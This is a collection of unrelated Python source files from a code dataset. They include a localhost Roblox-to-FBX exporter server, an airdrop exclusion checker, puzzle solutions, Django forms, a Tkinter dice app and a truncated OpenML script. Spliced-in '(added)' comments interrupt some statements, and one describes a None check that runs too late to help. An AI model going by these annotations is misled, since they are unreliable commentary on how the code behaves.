texture_name + \".\" + texture_ext\n\n full_texture_file_name = desc.textures_folder + texture_file_name\n ensure_path_exist(full_texture_file_name)\n dest_file = open(full_texture_file_name, 'wb')\n dest_file.write(texture_payload)\n dest_file.close()\n\n doc.create_texture(node.name + \"Tex\", texture_file_name, mat_id)\n mesh_transform_vertices(mesh, cframe_rotation_y(3.14159),\n node.offset_x, node.offset_y, node.offset_z,\n node.scale_x, node.scale_y, node.scale_z)\n\n geo = rbmesh.convert_mesh_to_fbx_geometry(mesh, 0)\n fbx_id = doc.create_mesh(node.name, xform, geo, mat_id, fbx_parent_id)\n\n doc.connect_objects(fbx_id, desc.geos_layer_id)\n elif isinstance(node, Bone):\n logger.message(\"FBX Bone: \" + node.name)\n xform = get_fbx_transform(node.cframe)\n if node.cframe_local is not None:\n xform = get_fbx_transform(node.cframe_local)\n fbx_id = doc.create_bone(node.name, xform, fbx_parent_id)\n\n doc.connect_objects(fbx_id, desc.bones_layer_id)\n elif isinstance(node, Attachment):\n logger.message(\"FBX Attachment: \" + node.name)\n xform = get_fbx_transform(node.cframe)\n if node.geo is None:\n fbx_id = doc.create_locator(node.name, xform, fbx_parent_id)\n else:\n fbx_id = doc.create_mesh(node.name, xform, node.geo, desc.attachments_material_id, fbx_parent_id)\n\n doc.connect_objects(fbx_id, desc.attachments_layer_id)\n else:\n logger.message(\"FBX Group: \" + node.name)\n fbx_id = doc.create_group(node.name, fbx_parent_id)\n\n for child in node.children:\n append_to_fbx(doc, child, fbx_id, desc)\n\n return\n\n\ndef _get_linearized_tree_recursive(res: list, node: Instance):\n res.append(node)\n for child in node.children:\n _get_linearized_tree_recursive(res, child)\n\n\ndef get_linearized_tree(root: Instance) -> list:\n res = list()\n res.append(root)\n\n for child in root.children:\n _get_linearized_tree_recursive(res, child)\n\n return res\n\n\ndef mesh_transform_vertices(mesh: rbmesh.Mesh, cframe: CFrame,\n ox: float = 0, oy: float = 0, oz: float = 0,\n sx: float = 1, sy: float = 1, sz: float = 1):\n\n for vertex in mesh.vertices:\n x = (vertex.p_x + ox) * sx\n y = (vertex.p_y + oy) * sy\n z = (vertex.p_z + oz) * sz\n vertex.p_x, vertex.p_y, vertex.p_z = cframe_transform_pos(cframe, x, y, z)\n nx = vertex.n_x\n ny = vertex.n_y\n nz = vertex.n_z\n vertex.n_x, vertex.n_y, vertex.n_z = cframe_transform_vec(cframe, nx, ny, nz)\n\n return\n\n\ndef export_roblox_model(model_desc) -> str:\n root = parse_model_desc(model_desc)\n # logger.message(str(root))\n\n file_folder = \"./Avatars/\" + root.name + \"/\"\n file_name = file_folder + root.name + \".fbx\"\n\n rot_y_180 = cframe_rotation_y(3.14159)\n spike_pivot = cframe_translation(0, 0.5, 0)\n\n logger.message(\"Create FBX...\")\n doc = fbx.FbxDocument(file_name)\n sphere_geo = load_mesh_as_fbx_geo(\"./built-in/sphere.mesh\", rot_y_180)\n spike_geo = load_mesh_as_fbx_geo(\"./built-in/spike.mesh\", cframe_multiply(rot_y_180, spike_pivot))\n\n scene_desc = SceneDescription()\n scene_desc.textures_folder = file_folder\n scene_desc.attachments_material_id, _ = doc.create_material(\"AttachmentMat\", fbx.FbxColor4(1, 0.8, 0.8, 1))\n scene_desc.attachments_layer_id = doc.create_layer(\"Attachments\", fbx.FbxColor4(1, 0, 0))\n scene_desc.bones_layer_id = doc.create_layer(\"Bones\", fbx.FbxColor4(0, 0, 1))\n scene_desc.geos_layer_id = doc.create_layer(\"Geos\", fbx.FbxColor4(0, 1, 0))\n scene_desc.accs_layer_id = doc.create_layer(\"Accs\", fbx.FbxColor4(1, 1, 0))\n\n root_primary_part = None\n scene_center_cframe = CFrame()\n if 
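root is None:\n return 'Error: no root object' # (added, hypothetical) defensive exit; parse_model_desc already asserts a single root\n # (added note) the scene is re-centered on the primary part (or on LowerTorso via the Root Motor6D special case below) before the Roblox-to-Maya conversion.\n if 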
root.primary_part is not None:\n root_primary_part = root.primary_part\n scene_center_cframe = root.primary_part.cframe\n\n assert root_primary_part is not None\n\n # Accessories handler\n accessories = list()\n for child in root.children:\n if isinstance(child, Accessory):\n child.parent = None\n accessories.append(child)\n logger.message(\"Accessory: \" + child.name)\n for accessory in accessories:\n root.children.remove(accessory)\n\n # convert part based rig (Motor6Ds) to bone based\n nodes = get_linearized_tree(root)\n\n # Step 0. Cover a special case, in R15 case everything should be centered around LowerTorso\n for node in nodes:\n if isinstance(node, Motor6D) and node.name == \"Root\":\n scene_center_cframe = cframe_multiply(node.part0.cframe, node.c0)\n break\n\n scene_center_cframe_inv = cframe_inverse(scene_center_cframe)\n\n # Step 1. Center the scene\n logger.message(\"1. Center scene\")\n for node in nodes:\n if isinstance(node, Part) or isinstance(node, MeshPart) or isinstance(node, Bone):\n node.cframe = cframe_multiply(scene_center_cframe_inv, node.cframe)\n\n # Step 2. Generate bones from motor6Ds\n logger.message(\"2. Generate bones\")\n bones = list()\n\n humanoid_root_bone = Bone()\n humanoid_root_bone.name = \"HumanoidRootNode\"\n humanoid_root_bone.parent = None\n humanoid_root_bone.cframe = CFrame()\n humanoid_root_bone.cframe_local = CFrame()\n humanoid_root_bone.m6d = None\n bones.append(humanoid_root_bone)\n\n for node in nodes:\n # skip HumanoidRootPart\n if node == root_primary_part:\n continue\n\n if isinstance(node, Motor6D):\n bone = Bone()\n bone.name = get_bone_name_from_m6d(node)\n bone.parent = None\n bone.m6d = node\n #\n # these two matrices below are equal\n # get_fbx_transform(cframe_multiply(node.part1.cframe, node.c1))\n # get_fbx_transform(cframe_multiply(node.part0.cframe, node.c0))\n bone.cframe = cframe_roblox_to_maya(cframe_multiply(node.part0.cframe, node.c0))\n bones.append(bone)\n\n # Step 3. Rename geos\n logger.message(\"3. Rename geos\")\n for node in nodes:\n if isinstance(node, Part) or isinstance(node, MeshPart):\n node.name = node.name + \"_Geo\"\n\n # Step 4. Reconstruct hierarchy\n logger.message(\"4. 
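\" # (added) implicit string concatenation; the step name continues below\n # (added note) bones are linked breadth-first: a Motor6D attaches as soon as either of its two parts is already connected, and the while loop repeats until no unprocessed bones remain.\n \"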
Build hierarchy\")\n already_connected_parts = dict()\n already_connected_parts[root_primary_part] = humanoid_root_bone\n\n bones_to_process = list()\n while True:\n bones_to_process.clear()\n for bone in bones:\n # ignore already processed bones\n if bone.m6d is None:\n continue\n\n parent_bone0 = already_connected_parts.get(bone.m6d.part0, None)\n parent_bone1 = already_connected_parts.get(bone.m6d.part1, None)\n\n child_part = None\n parent_bone = None\n if parent_bone0 is not None:\n assert parent_bone1 is None\n parent_bone = parent_bone0\n child_part = bone.m6d.part1\n\n if parent_bone1 is not None:\n assert parent_bone0 is None\n parent_bone = parent_bone1\n child_part = bone.m6d.part0\n\n if parent_bone is None:\n continue\n\n bones_to_process.append((parent_bone, child_part, bone))\n\n for parent_bone, child_part, child_bone in bones_to_process:\n logger.message(parent_bone.name + \" -> \" + child_bone.name + \"/\" + child_part.name)\n child_bone.m6d = None\n child_bone.parent = parent_bone\n parent_bone.children.append(child_bone)\n child_bone.cframe_local = cframe_multiply(cframe_inverse(parent_bone.cframe), child_bone.cframe)\n already_connected_parts[child_part] = child_bone\n\n number_of_bones_to_process = 0\n for bone in bones:\n if bone.m6d is not None:\n number_of_bones_to_process += 1\n\n if number_of_bones_to_process == 0:\n break\n\n # Step 6. Rotate by 180 degree and add root bones to the FBX scene\n for node in nodes:\n if isinstance(node, Attachment):\n # from Roblox local space to Maya world space\n node.cframe = cframe_roblox_to_maya(cframe_multiply(node.parent.cframe, node.cframe))\n\n for node in nodes:\n if isinstance(node, Part) or isinstance(node, MeshPart):\n # from Roblox world space to Maya world space\n node.cframe = cframe_roblox_to_maya(node.cframe)\n\n # Step 7. 
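(title continues below)\n # (added note) *Attachment nodes are renamed to the importer's *_Att convention, and the two Grip attachments get the extra 90-degree X rotation described in the linked Roblox article.\n # Step 7. 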
Attach mesh part to corresponding bones\n # a) built attachments list\n geom_to_attachments = dict()\n for node in nodes:\n if isinstance(node, Attachment) and not node.name.endswith(\"RigAttachment\"):\n if node.name.endswith(\"Attachment\"):\n node.name = node.name[:-10] + \"_Att\"\n\n parent_geo_name = node.parent.name\n geo_attachments = geom_to_attachments.get(parent_geo_name, None)\n if not geo_attachments:\n geo_attachments = list()\n geom_to_attachments[parent_geo_name] = geo_attachments\n\n geo_attachments.append(node)\n\n # b) destroy existing hierarchy (unlink)\n for node in nodes:\n node.children.clear()\n node.parent = None\n\n # c) add geo/attachments to corresponding bones\n for bone in bones:\n part_name = bone.name + \"_Geo\"\n for node in nodes:\n if node.name == part_name and (isinstance(node, Part) or isinstance(node, MeshPart)):\n node.cframe = cframe_multiply(cframe_inverse(bone.cframe), node.cframe)\n node.parent = bone\n bone.children.append(node)\n\n geo_attachments = geom_to_attachments.get(part_name, None)\n if geo_attachments:\n for attachment in geo_attachments:\n\n if attachment.name == \"LeftGrip_Att\" or attachment.name == \"RightGrip_Att\":\n #\n # https://developer.roblox.com/en-us/articles/using-avatar-importer\n #\n # The LeftGrip_Att and RightGrip_Att attachments have a 90 deg rotation on the X axis.\n # In short, their rotation should be (90, 0, 0).\n #\n attachment.cframe = cframe_multiply(attachment.cframe, cframe_rotation_x(3.14159))\n attachment.geo = spike_geo\n else:\n attachment.geo = sphere_geo\n\n attachment.cframe = cframe_multiply(cframe_inverse(bone.cframe), attachment.cframe)\n attachment.parent = bone\n bone.children.append(attachment)\n\n root_bone_id = doc.create_bone(\"Root\", fbx.FbxTransform())\n doc.connect_objects(root_bone_id, scene_desc.bones_layer_id)\n\n root_att_id = doc.create_mesh(\"Root_Att\", fbx.FbxTransform(),\n sphere_geo, scene_desc.attachments_material_id, root_bone_id)\n doc.connect_objects(root_att_id, scene_desc.attachments_layer_id)\n\n append_to_fbx(doc, humanoid_root_bone, root_bone_id, scene_desc)\n\n if len(accessories) > 0:\n accessories_id = doc.create_group(\"Accessories\")\n doc.connect_objects(accessories_id, scene_desc.accs_layer_id)\n for accessory in accessories:\n accessory_name = accessory.name\n if accessory_name.endswith(\"Accessory\"):\n accessory_name = accessory_name[:-9] + \"_Acc\"\n\n accessory_nodes = get_linearized_tree(accessory)\n\n # move attachments to world space\n for accessory_node in accessory_nodes:\n if isinstance(accessory_node, Attachment) and accessory_node.parent is not None:\n accessory_node.cframe = cframe_multiply(accessory_node.parent.cframe, accessory_node.cframe)\n\n # destroy existing hierarchy\n for accessory_node in accessory_nodes:\n accessory_node.children.clear()\n accessory_node.parent = None\n\n root_accessory_id = doc.create_group(accessory_name, accessories_id)\n\n for accessory_node in accessory_nodes:\n if isinstance(accessory_node, MeshPart):\n # Center accessory\n accessory_node.cframe = cframe_multiply(scene_center_cframe_inv, accessory_node.cframe)\n # from Roblox world space to Maya world space\n accessory_node.cframe = cframe_roblox_to_maya(accessory_node.cframe)\n append_to_fbx(doc, accessory_node, root_accessory_id, scene_desc)\n\n if isinstance(accessory_node, Attachment):\n accessory_node.geo = sphere_geo\n\n # Center accessory\n accessory_node.cframe = cframe_multiply(scene_center_cframe_inv, accessory_node.cframe)\n # from Roblox world space to 
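Maya world space (comment continues below)\n # (added note) cframe_roblox_to_maya negates the X and Z translation while copying the rotation terms, flipping between the Roblox and Maya axis conventions.\n # from Roblox world space to 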
Maya world space\n accessory_node.cframe = cframe_roblox_to_maya(accessory_node.cframe)\n\n append_to_fbx(doc, accessory_node, root_accessory_id, scene_desc)\n\n text = doc.finalize()\n\n logger.message(\"Save FBX '\" + file_name + \"'\")\n ensure_path_exist(file_name)\n file_handle = open(file_name, 'w+')\n file_handle.write(text)\n file_handle.close()\n\n return \"Saved file:\" + file_name\n\n\nclass ForgeHTTPArtServerRequestHandler(BaseHTTPRequestHandler):\n\n # noinspection PyPep8Naming\n def do_POST(self):\n\n content_length = int(self.headers['Content-Length'])\n body = self.rfile.read(content_length).decode('utf-8')\n\n model_description = json.loads(body)\n # result = fetch_roblox_model_to_disk(model_description)\n result = export_roblox_model(model_description)\n\n self.send_response(200)\n\n # Send headers\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n # Write content as utf-8 data\n self.wfile.write(bytes(result, \"utf8\"))\n return\n\n # noinspection PyPep8Naming\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"application/json\")\n self.end_headers()\n\n response = \"{\"\n\n # add accessories\n accessories_file = open('./accessories.txt', 'r')\n if accessories_file:\n response += '\"accessories\": ['\n lines = accessories_file.readlines()\n need_comma = False\n for line in lines:\n ln = line.rstrip()\n if not ln.isdigit():\n continue\n if need_comma:\n response += \", \"\n response += ln\n need_comma = True\n response += '], '\n else:\n logger.warn(\"Can't open accessories.txt\")\n\n # add heads\n heads_file = open('./heads.txt', 'r')\n if heads_file:\n response += '\"heads\": ['\n lines = heads_file.readlines()\n need_comma = False\n for line in lines:\n ln = line.rstrip()\n if not ln.isdigit():\n continue\n if need_comma:\n response += \", \"\n response += ln\n need_comma = True\n response += '], '\n else:\n logger.warn(\"Can't open heads.txt\")\n\n # add bundles\n bundles_file = open('./bundles.txt', 'r')\n if bundles_file:\n response += '\"bundles\": ['\n lines = bundles_file.readlines()\n need_comma = False\n for line in lines:\n ln = line.rstrip()\n if not ln.isdigit():\n continue\n if need_comma:\n response += \", \"\n response += ln\n need_comma = True\n response += ']'\n else:\n logger.warn(\"Can't open bundles.txt\")\n\n response += \"}\"\n self.wfile.write(bytes(response, \"utf8\"))\n return\n\n\ndef signal_handler(_signal, _frame):\n logger.message('\\nAvatar FBX Exporter Server closed by user request.')\n sys.exit(0)\n\n\ndef main():\n if sys.version_info[0] != 3:\n logger.fatal(\"Python3 required\")\n\n signal.signal(signal.SIGINT, signal_handler)\n\n server_address = ('127.0.0.1', 49999)\n\n httpd = HTTPServer(server_address, ForgeHTTPArtServerRequestHandler)\n logger.message('Roblox Avatar FBX Exporter Server \"{0}:{1}\"'.format(server_address[0], server_address[1]))\n logger.message('by Sergey Makeev\\n')\n logger.message('Press Ctrl+C to exit')\n httpd.serve_forever()\n\n\nmain()\n","repo_name":"SergeyMakeev/RobloxAvatarExporter","sub_path":"FbxExporterServer.py","file_name":"FbxExporterServer.py","file_ext":"py","file_size_in_byte":38233,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"34543410133","text":"\"\"\"Check which of our users were included in the paraswap list.\"\"\"\n\nimport csv\n\nINPUT_FILE = \"included.csv\"\nPARASWAP_INCLUDED = \"paraswap.txt\"\nOUTPUT_FILE = \"paraswap_excluded.csv\"\n\n\ndef main():\n paraswap_accs = 
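load_paraswap() # (added) the same call is reopened below; load_paraswap is a pure file read, so the repeat is harmless\n # (added note) a row counts as excluded only when neither its wallet nor its EOA address appears in the paraswap set; both sides are compared lowercased.\n paraswap_accs = 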
load_paraswap()\n para_excluded = []\n\n with open(INPUT_FILE) as f:\n reader = csv.reader(f)\n assert len(next(reader)) == 4\n\n for _, wallet_address, eoa_address, trans_hash in reader:\n if (\n wallet_address.lower() not in paraswap_accs\n and eoa_address.lower() not in paraswap_accs\n ):\n para_excluded.append((wallet_address, eoa_address, trans_hash))\n\n if para_excluded:\n with open(OUTPUT_FILE, \"w\") as f:\n writer = csv.writer(f)\n writer.writerow([\"wallet_address\", \"eoa_address\", \"transaction_hash\"])\n writer.writerows(para_excluded)\n print(f\"wrote excluded users to {OUTPUT_FILE}\")\n else:\n print(\"all users present and accounted for\")\n\n\ndef load_paraswap():\n with open(PARASWAP_INCLUDED) as f:\n return set(l.strip().lower() for l in f.readlines())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dharmaprotocol/excluded-uni-airdrop-users","sub_path":"projects/Monolith/check_paraswap.py","file_name":"check_paraswap.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"48"} +{"seq_id":"3127790591","text":"def get_seat_number(letters, begin=0, end=None):\r\n if end == None: end = 2**(len(letters)) - 1 # first call of func\r\n\r\n if len(letters) == 1: # shall we stop\r\n if letters[0] in ['F', 'L']:\r\n return begin\r\n elif letters[0] in ['B', 'R']:\r\n return end\r\n # calculate the middle\r\n middle = (end - begin + 1) // 2\r\n # And then take lower(F|L) or upper(B|R) part\r\n direction = letters.pop(0)\r\n if direction in ['F', 'L']:\r\n end = begin + middle - 1\r\n elif direction in ['B', 'R']:\r\n begin = begin + middle\r\n return get_seat_number(letters, begin, end)\r\n\r\n\r\ndef strip_seats(seats): # for task2\r\n '''\r\n Technically, not the best way of doing it...\r\n We'll just remove 'very front' seats\r\n '''\r\n if seats[1] - seats[0] == 1: return strip_seats(seats[1:])\r\n return seats[1]\r\n\r\n\r\ndef exercise():\r\n f = open(\"ex5.txt\", \"rt\")\r\n lines = f.read().strip().split()\r\n f.close()\r\n\r\n highest_seat_number = 0 # for task1\r\n total_seats = list(range(0, 1024)) # for task2. 
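(comment continues below)\r\n # (added note, worked example) a boarding pass is a 10-bit binary number with F/L as 0 and B/R as 1: int('BFFFBBFRRR'.translate(str.maketrans('FBLR', '0101')), 2) == 567, matching row * 8 + col from the bisection above.\r\n # for task2. 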
All seats\r\n\r\n for line in lines:\r\n row_letters = line[:7]\r\n col_letters = line[-3:]\r\n row = get_seat_number(list(row_letters))\r\n col = get_seat_number(list(col_letters))\r\n seat = row * 8 + col\r\n if seat > highest_seat_number: highest_seat_number = seat\r\n total_seats.remove(seat) # for task 2\r\n\r\n print(f\"The highest seat: {highest_seat_number}\")\r\n print(\"My seat:\", strip_seats(total_seats))\r\n\r\n\r\nexercise()\r\n","repo_name":"stels17/AdventOfCode2020","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16311593569","text":"from django import forms\nfrom apps.products.models import OcProduct, OcProductDescriptionBase, OcProductDescription, OcProductToStore, \\\n OcProductToCategory, OcTsgProductVariantCore, OcTsgProductVariants\n\nfrom apps.options.models import OcTsgProductVariantCoreOptions, OcTsgProductVariantOptions\n\nfrom tinymce.widgets import TinyMCE\n\n\nclass ProductForm(forms.ModelForm):\n\n class Meta:\n model = OcProduct\n\n fields = ['product_id', 'supplier', 'status', 'mib_logo', 'tax_class']\n\n labels = {\n 'mib_logo': 'Made in Britain',\n 'status': 'Product is visable',\n }\n\n\nclass ProductDescriptionBaseForm(forms.ModelForm):\n description = forms.CharField(widget=TinyMCE(attrs={'rows': 10}))\n long_description = forms.CharField(widget=TinyMCE(attrs={'rows': 20}))\n sign_reads = forms.CharField(widget=TinyMCE(attrs={'rows': 10}))\n\n class Meta:\n model = OcProductDescriptionBase\n\n fields = '__all__'\n\n widgets = {\n 'product': forms.HiddenInput,\n\n }\n\n labels = {\n 'mib_logo': 'Made in Britain',\n }\n\n\nclass SiteProductDetailsForm(forms.ModelForm):\n description = forms.CharField(widget=TinyMCE(attrs={'rows': 10}), required=False)\n long_description = forms.CharField(widget=TinyMCE(attrs={'rows': 20}), required=False)\n sign_reads = forms.CharField(widget=TinyMCE(attrs={'rows': 10}), required=False)\n\n class Meta:\n model = OcProductToStore\n\n fields = '__all__'\n\n labels = {\n 'status': 'Product is visible',\n }\n\n widgets = {\n 'product': forms.HiddenInput,\n 'store': forms.HiddenInput,\n\n }\n\n\nclass ProductCategoryForm(forms.ModelForm):\n class Meta:\n model = OcProductToCategory\n fields = '__all__'\n\n labels = {\n 'status': 'Product is visible',\n }\n\n widgets = {\n 'product': forms.HiddenInput,\n 'category_store': forms.HiddenInput,\n\n }\n\n\nclass VariantCoreOptionsForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCoreOptions\n fields = '__all__'\n\n widgets = {\n 'product_variant': forms.HiddenInput\n }\n\n\nclass VariantCoreOptionsOrderForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCoreOptions\n fields = '__all__'\n\n widgets = {\n 'product_variant': forms.HiddenInput,\n 'option_value': forms.HiddenInput,\n 'option_class': forms.HiddenInput,\n }\n\n labels = {\n 'order_by': 'New order position',\n }\n\n\nclass VariantCoreForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCore\n fields = '__all__'\n\n widgets = {\n 'product': forms.HiddenInput,\n 'prod_variant_core_id': forms.HiddenInput,\n 'size_material': forms.HiddenInput,\n\n }\n\n labels = {\n 'exclude_fpnp': 'Exclude from Free Shipping',\n 'shipping_cost': 'Cost for this Shipping',\n 'gtin': 'GTIN',\n 'bl_live': 'LIVE',\n }\n\nclass VariantCoreEditForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantCore\n fields = '__all__'\n\n widgets = {\n 
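# (added note) the hidden FK fields below are injected by the view; users edit only the visible labels and flags.\n 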
'product': forms.HiddenInput,\n 'prod_variant_core_id': forms.HiddenInput,\n 'size_material': forms.HiddenInput,\n\n }\n\n labels = {\n 'exclude_fpnp': 'Exclude from Free Shipping',\n 'shipping_cost': 'Cost for this Shipping',\n 'gtin': 'GTIN ',\n 'bl_live': 'LIVE',\n }\n\n\n\nclass SiteVariantOptionsForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariantOptions\n fields = '__all__'\n\n widgets = {\n 'product_variant': forms.HiddenInput,\n 'product_var_core_option': forms.HiddenInput\n }\n\n labels = {\n 'order_by': 'New order position',\n }\n\n\nclass SiteProductVariantForm(forms.ModelForm):\n class Meta:\n model = OcTsgProductVariants\n fields = '__all__'\n\n widgets = {\n 'prod_var_core_id': forms.HiddenInput,\n 'store': forms.HiddenInput,\n 'digital_artwork': forms.HiddenInput,\n 'digital_artwork_price': forms.HiddenInput,\n 'digital_artwork_def': forms.HiddenInput,\n 'isdeleted': forms.HiddenInput,\n }\n\n\n","repo_name":"simonfroggatt/medusa","sub_path":"apps/products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39656868796","text":"\r\ndef factors(x):\r\n '''Returns the number of divisors of x'''\r\n factors = 0\r\n for factor in range(1,int(x**(1/2))+1):\r\n if x%factor == 0:\r\n factors+=2\r\n if factor**2 ==x:\r\n factors-=1\r\n return(factors)\r\n \r\ndef triangle(x):\r\n '''Returns the sum of the first x integers'''\r\n return(int(x*(x+1)/2))\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\ndef trianglenumbers(fac):\r\n '''Returns the first triangle number with more than fac divisors'''\r\n '''A triangle number is the sum of the first n natural numbers'''\r\n '''Example: the 3rd triangle number is 6'''\r\n on = True\r\n n = 1\r\n while on:\r\n if factors(triangle(n)) > fac:\r\n on = False\r\n else:\r\n n += 1\r\n return(triangle(n))\r\n\r\ntrianglenumbers(500)\r\n\r\n \r\n","repo_name":"justinmyersdata/ProjectEuler","sub_path":"12_Project_Euler.py","file_name":"12_Project_Euler.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10852052895","text":"import theano\nfrom theano import tensor\n\n# declare variable types (floating-point scalars)\n# a scalar is a single numerical value\na = tensor.dscalar()\nb = tensor.dscalar()\n\n# create a symbolic expression\nc = a + b\n# compile the function from 1: input parameters, 2: symbolic expression\nf = theano.function([a,b],c)\n\nresult = f(1.5,2.5)\nprint (result)","repo_name":"Khallil/Machine_Learning_Practice","sub_path":"ML_Code/deep_learning/framework_practice/theano/theano_example.py","file_name":"theano_example.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5425871127","text":"import random\nimport tkinter as tk\nfrom tkinter import *\n\n\nroot = tk.Tk()\ncanvas = tk.Canvas(root,\n width=400,\n height=600,\n borderwidth=0,\n highlightthickness=0,\n bg=\"black\")\ncanvas.grid()\n\n\ndef potvrdenie():\n list_random_cisel = []\n pocet = input_loop.get()\n print(f\"pocet {pocet}\")\n\n for x in range(int(pocet)):\n random_value = random.randint(1, 6)\n print(random_value)\n list_random_cisel.append(random_value)\n\n vypocet(list_random_cisel)\n\n\ndef vypocet(list_random_cisel):\n for iterator_aktual in list_random_cisel:\n root.after(1000, update_text, iterator_aktual) # (fixed) pass the callable and its args separately; update_text(iterator_aktual) ran immediately and scheduled its None return value\n\n\ndef 
update_text(iterator_aktual):\n text_list = [\"text_1\",\n \"text_2\",\n \"text_3\",\n \"text_4\",\n \"text_5\",\n \"text_6\"]\n\n text_list2 = [text_1,\n text_2,\n text_3,\n text_4,\n text_5,\n text_6]\n\n canvas.itemconfigure(text_aktualne, text=iterator_aktual)\n for x in range(0, len(text_list)):\n if int(iterator_aktual) == int(text_list[x][5:]):\n print(iterator_aktual)\n canvas.insert(text_list2[x], tk.END, \"*\")\n canvas.update()\n\n\ndef _kruh(self, x, y, r, **kwargs):\n return self.create_oval(x - r, y - r, x + r, y + r, **kwargs)\n\n\ndef _text(self, x, y, **kwargs):\n return self.create_text(x, y, **kwargs)\n\n\ntk.Canvas.kruh = _kruh\ntk.Canvas.text = _text\n\nkruh = canvas.kruh(200, 200, 100, fill=\"#fff\", width=0)\ntext_aktualne = canvas.text(200, 200, text=\"\")\ntext_1 = canvas.text(200, 410, text=\"1: \", fill=\"white\")\ntext_2 = canvas.text(200, 430, text=\"2: \", fill=\"white\")\ntext_3 = canvas.text(200, 450, text=\"3: \", fill=\"white\")\ntext_4 = canvas.text(200, 470, text=\"4: \", fill=\"white\")\ntext_5 = canvas.text(200, 490, text=\"5: \", fill=\"white\")\ntext_6 = canvas.text(200, 510, text=\"6: \", fill=\"white\")\n\ninput_loop = Entry(root)\ninput_loop.grid()\npocet_loopov = canvas.create_window(200, 10, width=100, window=input_loop)\n\nenter_button = Button(root, text=\"potvrdenie\", command=potvrdenie)\nenter_button.grid()\ntlacitko = canvas.create_window(200, 35, width=100, window=enter_button)\n\nroot.mainloop()\n","repo_name":"Cupprum/MATURITA_INFO","sub_path":"RIESENIA/app1_2.py","file_name":"app1_2.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16841028697","text":"import time\nfrom datetime import datetime\nfrom typing import Dict, List, Any, Tuple, Callable\n\nfrom numpy import nan\nimport numpy as np\nimport openml\nimport pandas as pd\nfrom ConfigSpace.configuration_space import Configuration\nfrom sklearn.base import is_classifier\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.engine.url import URL\n\nfrom config import DatasetConfig\nfrom constants import AlgorithmStatus\nfrom core import Core\nfrom database import Database, Algorithm\nfrom methods import ALGORITHMS\n\nmapping = {\n 'sklearn.ensemble.forest.RandomForestClassifier': 'random_forest',\n 'sklearn.feature_selection.variance_threshold.VarianceThreshold': 'variance_threshold',\n 'sklearn.ensemble._forest.RandomForestClassifier': 'random_forest',\n 'sklearn.decomposition.pca.PCA': 'pca',\n 'sklearn.ensemble.forest.ExtraTreesClassifier': 'extra_trees',\n 'sklearn.tree._classes.ExtraTreesClassifier': 'extra_trees',\n # 'sklearn.ensemble.gradient_boosting.GradientBoostingClassifier': None,\n 'sklearn.preprocessing.data.Binarizer': 'binarizer',\n 'sklearn.tree.tree.DecisionTreeClassifier': 'decision_tree',\n 'sklearn.tree._classes.DecisionTreeClassifier': 'decision_tree',\n 'sklearn.discriminant_analysis.LinearDiscriminantAnalysis': 'linear_discriminant_analysis',\n 'sklearn.ensemble._hist_gradient_boosting.gradient_boosting.HistGradientBoostingClassifier': 'gradient_boosting',\n 'sklearn.ensemble._weight_boosting.AdaBoostClassifier': 'ada_boosting',\n 'sklearn.ensemble.weight_boosting.AdaBoostClassifier': 'ada_boosting',\n 'sklearn.feature_selection.univariate_selection.SelectKBest': 'select_k_best',\n 'sklearn.preprocessing.data.StandardScaler': 'standard_scaler',\n 'sklearn.preprocessing._data.StandardScaler': 'standard_scaler',\n 'sklearn.naive_bayes.GaussianNB': 
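'gaussian_nb', # (added) the same key/value pair is reopened below; identical duplicates in a dict literal are harmless\n # (added note) mapping covers both the pre- and post-0.22 sklearn module paths for each estimator; pipelines containing an unmapped class are skipped by the import loop.\n 'sklearn.naive_bayes.GaussianNB': 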
'gaussian_nb',\n 'sklearn.svm.classes.SVC': 'libsvm_svc',\n 'sklearn.svm._classes.SVC': 'libsvm_svc',\n 'sklearn.impute.SimpleImputer': 'imputation',\n 'sklearn.impute._base.SimpleImputer': 'imputation',\n 'sklearn.discriminant_analysis.QuadraticDiscriminantAnalysis': 'qda',\n 'sklearn.linear_model.logistic.LogisticRegression': 'logistic_regression',\n 'sklearn.linear_model._logistic.LogisticRegression': 'logistic_regression',\n 'sklearn.naive_bayes.MultinomialNB': 'multinomial_nb',\n 'sklearn.naive_bayes.BernoulliNB': 'bernoulli_nb',\n 'sklearn.neighbors.classification.KNeighborsClassifier': 'k_neighbors',\n 'sklearn.neighbors._classification.KNeighborsClassifier': 'k_neighbors',\n 'sklearn.preprocessing.data.OneHotEncoder': 'one_hot_encoding',\n 'sklearn.preprocessing._encoders.OneHotEncoder': 'one_hot_encoding',\n 'sklearn.preprocessing.data.MinMaxScaler': 'minmax',\n 'sklearn.cluster.hierarchical.FeatureAgglomeration': 'feature_agglomeration',\n 'sklearn.linear_model._stochastic_gradient.SGDClassifier': 'sgd',\n 'sklearn.neural_network.multilayer_perceptron.MLPClassifier': 'mlp_classifier',\n 'sklearn.preprocessing.data.RobustScaler': 'robust_scaler',\n 'sklearn.preprocessing.data.PolynomialFeatures': 'polynomial'\n}\n\n\ndef get_dataset(id):\n ds = openml.datasets.get_dataset(int(eval(id)))\n X, y, categorical_indicator, attribute_names = ds.get_data(\n dataset_format='dataframe',\n target=ds.default_target_attribute\n )\n if 